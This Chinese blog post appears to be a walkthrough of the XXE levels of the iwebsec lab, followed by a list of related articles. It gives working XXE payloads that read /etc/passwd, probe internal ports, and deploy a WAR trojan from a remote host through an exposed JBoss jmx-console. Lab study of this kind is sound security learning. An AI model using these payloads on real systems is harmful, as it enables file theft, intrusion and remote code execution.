iwebsec XXE漏洞

最新推荐文章于 2024-11-05 17:47:47 发布
最新推荐文章于 2024-11-05 17:47:47 发布
阅读量790 收藏 10
点赞数 11
文章标签: 网络 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44135070/article/details/135760412
版权

01-XXE漏洞文件读取

使用POST方式提交数据,这里用到火狐的插件hackbar,首先点击load URL,再勾选post data按钮,将构造好的XML恶意代码放入post框内,点击Execute进行post数据

<?xml version="1.0" ?> 
<!DOCTYPE creds [ 
<!ELEMENT username ANY >
<!ELEMENT password ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<creds>
<username>&xxe;</username>
<password>test</password>
</creds>

在这里插入图片描述

02-XXE漏洞内网探测

利用XXE漏洞进行内网探测,如果端口开启,请求返回的时间会很快;如果端口关闭,请求返回的时间会很慢。
当探测一个未开放的端口时,会有拒绝连接的提示,如:9000端口并未开放,探测9000端口时会出现以下报错,报错中带有failed to open stream: Connection refused。

<?xml version="1.0" ?> 
<!DOCTYPE creds [ 
<!ELEMENT username ANY >
<!ELEMENT password ANY >
<!ENTITY xxe SYSTEM "http://192.168.10.21:9003" >]>
<creds>
<username>&xxe;</username>
<password>test</password>
</creds>

在这里插入图片描述在这里插入图片描述
burpsuite在这里插入图片描述在这里插入图片描述
在这里插入图片描述

03-XXE漏洞内网应用攻击

通过XXE漏洞对内网应用程序进行攻击。
例如可以利用如下攻击代码对内网存在jmx控制台未授权访问的Jboss漏洞进行攻击,构造jboss一句话部署war包木马的XML语句(上个任务探测到的9080端口就是jboss服务)。

// An highlighted block
<?xml version="1.0" ?> 
<!DOCTYPE creds [ 
<!ELEMENT username ANY >
<!ELEMENT password ANY >
<!ENTITY xxe SYSTEM "http://192.168.12.100:9080/jmx-console/HtmlAdaptor?action=invokeOp&name=jboss.deployment:type=DeploymentScanner,flavor=URL&methodIndex=7&arg0=http://192.168.12.99/bm1.war" >]>
<creds>
<username>&xxe;</username>
<password>test</password>

在这里插入图片描述

XXE漏洞以及XXE漏洞如何修复
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
09-09 2万+
XXE漏洞是什么?XXE:XML External Entity 即外部实体,从安全角度理解成XML External Entity attack 外部实体注入攻击。由于程序在解析输入的XML数据时,解析了攻击者伪造的外部实体而产生的。这些就称为XXE漏洞。知道XXE漏洞前首先得先了解XML。XXE漏洞如何修复的方案一:使用开发语言提供的禁用外部实体的方法1.PHP开发语言禁用外部实体的方法:libxml_disable_entity_loader(true);XXE漏洞如何修复的方案二:尽量不要让用户直接
网络安全XXE漏洞详细解析
你在看屏幕的同时,屏幕也在注视着你
09-30 2051
XXE漏洞详细解析
iwebsec靶场 XXE关卡通关笔记
mooyuan的博客
11-04 1737
iwebsec靶场xxe关卡通关笔记XML外部实体注入简称XXE漏洞。XML用于标记电子文件使其具有结构性的标记语言,可以用来标记数据,定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。XML文档结构包括XML声明、DTD文档类型定义,文档元素。内部声明是直接在XML文件内部声明的,对于安全人员来说基本没用。外部声明是引用XML以外的文件,有风险。外部实体注入可能导致任意文件读取,系统命令执行,内网端口探测,攻击内网网站等等。
Web安全XXE漏洞
xlsj雪松的博客
01-26 675
1 定义 XXE就是XML外部实体注入。当允许引用外部实体时,通过构造恶意内容,就可能导致任意文件读取、系统命令执行、内网端口探测、攻击内网网站等危害。 2 XML XML是一个格式和HTML很像的标记语言,用来存储数据;XML是一个纯文本,标签都是自己定义的。 XML文件的格式: 实体写在DTD部分,XML部分是真正的存储数据的地方。DTD有两种声明方式: 1、内部 dtd:即对 XML 文档中的元素、属性和实体的 DTD 的声明都在 XML 文档中。 2、外部 dtd:即对 XML 文
安全基础~通用漏洞6
2514804004的博客
02-19 1112
小迪安全学习,XXE漏洞,文件包含学习,其中学习到php相关伪协议
iwebsec靶场(XXE漏洞
果粒程
03-07 976
iwebsec靶场(XXE漏洞
XSS漏洞 | iwebsec
weixin_52116519的博客
02-07 1270
攻击者在发帖的过程中,将恶意脚本连同正常信息一起注入帖子的内容中。客户端的脚本程序可以通过DOM动态修改页面内容,从客户端获取DOM中的数据并在本地执行。由于DOM是在客户端修改节点的,所以基于DOM型XSS漏洞不需要与服务器交互,它只发生在客户端处理数据阶段。这个跟反射型XSS很像,但是机制是不一样的,这里不需要用到后端,也就是不涉及php代码。将输入的东西提交后,展示在页面中,并且展示所有输入提交过的,这种就是存储型XSS了。是以前搭建好的,测了文件上传和一些SQL注入,现在好久没用了,重新启动。
iwebsec(代码执行)
果粒程
03-04 787
iwebsec(代码执行)
利用XXE进行内网主机探测
Vicl1fe的博客
12-22 1389
XXE漏洞大家也应该清楚了,不清楚可以看我的另两篇博客 https://blog.csdn.net/qq_41918771/article/details/103628721 https://blog.csdn.net/qq_41918771/article/details/103641745 内网主机探测 先上脚本 import requests def build_xml(ip): xml...
WEB常见漏洞XXE(靶场篇)_220 vmware authentication daemon version 1(2)
2401_84166965的博客
04-15 659
其实在我们攻击具有XXE漏洞的服务器时,受攻击服务器进行了两次响应,如果查看受攻击的服务器上的日志会发现两条记录:一次是对XML进行解析后对另一台远程服务器的访问,一次是访问服务器自身上具有XXE漏洞的文件。基于此,在实战中我们面对盲注时,构造xml内容让其访问我们能够控制的主机,然后查看我们能够控制的主机上是否具有来自受攻击机的访问记录就可确定是否有XML注入。可以看到确实收到了受攻击机的访问记录,说明受攻击机解析了XML内容,来访问了我们的公网ip主机(假设是公网ip主机)
第五节 XXE漏洞利用 - 任意文件读取 无回显 -01
09-15
XXE 漏洞利用 - 任意文件读取 无回显 XXE(XML External Entity)是一种常见的 Web 应用程序漏洞,攻击者可以通过构造恶意的 XML 文档, trick 服务器将任意文件读取出来,导致敏感信息泄露。在本节中,我们将详细...
XXE漏洞详解【内含vulnhub靶场XXE Lab:1详解】
07-30
XXE(XML External Entity)漏洞,全称为XML外部实体注入,是针对使用XML解析器的应用程序的一种安全漏洞。XML是一种标记语言,常用于数据交换,而外部实体是XML文档的一部分,允许引用外部资源,如文件系统、网络...
105-web漏洞挖掘之XXE漏洞1
08-03
XXE漏洞详解】 XXE,全称为XML External Entity Injection,是XML解析器在处理XML输入时因未能正确配置,允许加载外部实体而导致的安全漏洞。这类漏洞允许攻击者注入恶意的XML外部实体,进而获取敏感信息、执行...
【Java代码审计】XXE漏洞
大河之犬的博客
04-02 1379
XXE 漏洞的原理主要是利用了 XML 解析器的实体引用特性。在 XML 中,可以使用实体引用来引用外部的实体,例如文件,以便在 XML 文档中重用内容。然而,如果 XML 解析器未经适当配置,可能会导致外部实体的任意读取和执行,从而引发安全漏洞。攻击者可以构造恶意的 XML 文件,其中包含对外部实体的引用,并通过将这个 XML 文件提交给目标应用程序来触发漏洞。当目标应用程序解析这个 XML 文件时,解析器会尝试读取和解析外部实体,从而使得攻击者能够访问本地或远程系统上的文件,并执行相关操作。
文件读取 xxe_XXE
weixin_36165398的博客
01-14 761
一、 XXE是什么?有哪些危害?XML外部实体,允许XML引用外部数据作为变量。形式如下。]><user><username>&xxe;username><password>adminpassword>user>由于外部实体允许多种协议,所以XXE等同于任意文件读取+SSRFXXE靶场https://github....
Web安全:iwebsec || vulhub 靶场搭建.(各种漏洞环境集合,一键搭建漏洞测试靶场)
网络安全领域___专研者.
04-24 3346
iwebsec 本质上是一个漏洞集成容器,里面集成了大量的漏洞环境.(如:集合了SQL注入、文件包含、命令执行、XXE、反序列化、SSRF、XSS、文件上传等常见的web漏洞环境) Vulhub是一个面向大众的开源漏洞靶场,无需docker知识,简单执行两条命令即可编译、运行一个完整的漏洞靶场镜像。让漏洞复现变得更加简单,让安全研究者更加专注于漏洞原理本身.
windows文件读取 xxe_XXE漏洞利用方式详解
weixin_35029653的博客
12-11 678
XXE漏洞的详细原理解释和利用中,XXE的基本原理还有简单的文件读取利用方式我们已经有了基本的了解,那么接下来就带来我们的XXE漏洞详解——进阶篇!xxe漏洞利用在实战中往往会遇到很多的问题,也需要更多种多样的利用方式和技巧,本片就给大家一一介绍~读取文件时有特殊符号在读取文件时,文件中包含"<,>,&"等这些特殊符号时,会被xml解析器解析,报错从而导致读取失败,例如尝试读...
XXE之文件随意读取
weixin_48421613的博客
09-03 1901
XXE的利用 声明: 我们本次实验所使用的php版本为5.4版本,有些版本是实验不成功的 XXE注入可分为有回显的与没有回显的 有回显的:制造一个具有xxe漏洞的代码(xxe.php) <?php $xml=simplexml_load_string($_GET['xml']); echo $xml; //这是有回显的xxe注入 ?> 首先我们使用我们本地的服务器进行探测,使用burpsuite进行抓板进行分析 我们可以看到我们提交的参数已经出
第六章传输层协议、ACL
最新发布
2401_86349554的博客
11-05 845
第六章传输层协议、ACL
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值